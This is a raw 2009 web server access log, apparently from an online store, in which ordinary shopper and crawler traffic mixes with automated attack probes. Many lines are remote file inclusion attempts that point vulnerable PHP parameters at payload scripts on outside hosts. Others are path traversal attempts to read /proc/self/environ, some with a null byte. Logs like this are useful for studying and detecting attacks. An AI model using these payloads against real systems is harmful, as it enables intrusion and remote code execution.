87.106.245.84 - - [16/Jul/2009:01:22:03 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:22:05 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:08 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:09 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.22.140.17 - - [16/Jul/2009:01:22:10 -0400] "GET /logs/index.php?inhalt=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:01:22:10 -0400] "GET /logs/access_log.Q109052900/index.php?inhalt=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:01:22:10 -0400] "GET /index.php?inhalt=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:22:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:12 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:19 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:20 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C74483224E5000991000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [16/Jul/2009:01:22:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.140.75.14 - - [16/Jul/2009:01:22:29 -0400] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
58.227.193.198 - - [16/Jul/2009:01:22:30 -0400] "GET /lostpasswd.php?env[include_prefix]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:01:22:30 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:01:22:30 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:01:22:30 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:01:22:31 -0400] "GET /logs/access_log.Q109061300/index.php?inhalt=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.245.84 - - [16/Jul/2009:01:22:54 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:23:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C744F3A84E5003041000+M37+ENG HTTP/1.1" 200 41617 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C74483224E5000991000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.55.105.230 - - [16/Jul/2009:01:23:27 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.230 - - [16/Jul/2009:01:23:27 -0400] "GET /logs/error_log.Q108103000 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.230 - - [16/Jul/2009:01:23:28 -0400] "GET /logs/access_log.Q108053100 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
61.78.62.84 - - [16/Jul/2009:01:23:36 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:23:36 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:23:36 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:23:40 -0400] "GET /logs/access_log.Q109052700//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:23:40 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:23:40 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:24:17 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:01:24:20 -0400] "GET /logs/access_log.Q109050900//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
124.0.139.129 - - [16/Jul/2009:01:25:04 -0400] "GET /logs/access_log.Q109052800//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:01:25:04 -0400] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:01:25:10 -0400] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:01:25:20 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.248.150.52 - - [16/Jul/2009:01:25:25 -0400] "GET /logs/access_log.Q109060100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
125.248.150.52 - - [16/Jul/2009:01:25:25 -0400] "GET /!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
125.248.150.52 - - [16/Jul/2009:01:25:25 -0400] "GET /logs/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
125.248.150.52 - - [16/Jul/2009:01:25:25 -0400] "GET /logs/access_log.Q109071100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
124.0.139.129 - - [16/Jul/2009:01:25:32 -0400] "GET /logs/access_log.Q109052600//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.186.64.207 - - [16/Jul/2009:01:26:13 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
115.68.3.21 - - [16/Jul/2009:01:26:52 -0400] "GET /!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
115.68.3.21 - - [16/Jul/2009:01:26:52 -0400] "GET /logs/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
115.68.3.21 - - [16/Jul/2009:01:26:53 -0400] "GET /logs/access_log.Q109060100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
115.68.3.21 - - [16/Jul/2009:01:26:53 -0400] "GET /logs/access_log.Q109071100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
115.68.3.21 - - [16/Jul/2009:01:26:57 -0400] "GET /!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
115.68.3.21 - - [16/Jul/2009:01:26:57 -0400] "GET /logs/access_log.Q109060100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
115.68.3.21 - - [16/Jul/2009:01:26:57 -0400] "GET /logs/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.253.240.80 - - [16/Jul/2009:01:27:04 -0400] "GET /logs/access_log.Q109060100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
89.253.240.80 - - [16/Jul/2009:01:27:04 -0400] "GET /logs/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
89.253.240.80 - - [16/Jul/2009:01:27:04 -0400] "GET /!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.186.64.207 - - [16/Jul/2009:01:27:04 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
115.68.3.21 - - [16/Jul/2009:01:27:08 -0400] "GET /logs/access_log.Q109071100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
89.253.240.80 - - [16/Jul/2009:01:27:11 -0400] "GET /logs/access_log.Q109071100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
195.186.64.207 - - [16/Jul/2009:01:27:24 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:01:27:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.153.6.44 - - [16/Jul/2009:01:27:51 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.153.6.44 - - [16/Jul/2009:01:27:51 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs/access_log.Q109061900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:01:27:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
195.186.64.207 - - [16/Jul/2009:01:28:23 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
81.13.86.34 - - [16/Jul/2009:01:29:04 -0400] "GET /!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
81.13.86.34 - - [16/Jul/2009:01:29:04 -0400] "GET /logs/access_log.Q109060100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
124.0.139.129 - - [16/Jul/2009:01:29:19 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
81.13.86.34 - - [16/Jul/2009:01:29:22 -0400] "GET /logs/access_log.Q109071100/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
81.13.86.34 - - [16/Jul/2009:01:29:22 -0400] "GET /logs/!rfihttp://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
124.0.139.129 - - [16/Jul/2009:01:29:32 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:03 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:03 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:03 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:05 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:05 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:05 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [16/Jul/2009:01:30:17 -0400] "GET /logs/error_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:46 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.71.241.146 - - [16/Jul/2009:01:30:55 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
207.210.89.18 - - [16/Jul/2009:01:32:12 -0400] "GET /logs/access_log.Q109070600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 267 "-" "Microsoft Pocket Internet Explorer/0.6"
207.210.89.18 - - [16/Jul/2009:01:32:12 -0400] "GET /logs/access_log.Q109070600/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 235 "-" "Avant Browser (http://www.avantbrowser.com)"
207.210.89.18 - - [16/Jul/2009:01:32:12 -0400] "GET /logs/access_log.Q109070600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
207.210.89.18 - - [16/Jul/2009:01:32:12 -0400] "GET /logs/access_log.Q109070600//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
75.140.75.14 - - [16/Jul/2009:01:32:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C744538E455008921000+M37+ENG HTTP/1.1" 200 77342 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C744F3A84E5003041000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [16/Jul/2009:01:32:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [16/Jul/2009:01:32:34 -0400] "GET /logs/error_log.Q109060900%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
75.140.75.14 - - [16/Jul/2009:01:32:38 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C744538E455008921000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:32:38 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C744538E455008921000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:32:38 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C744538E455008921000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
85.153.6.44 - - [16/Jul/2009:01:32:42 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.153.6.44 - - [16/Jul/2009:01:32:42 -0400] "GET /logs/access_log.Q109062900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.153.6.44 - - [16/Jul/2009:01:32:43 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
85.153.6.44 - - [16/Jul/2009:01:32:43 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
66.71.241.146 - - [16/Jul/2009:01:32:51 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:32:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C76473D1425009EF1001+M37+ENG HTTP/1.1" 200 54296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C744538E455008921000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.71.241.146 - - [16/Jul/2009:01:32:57 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
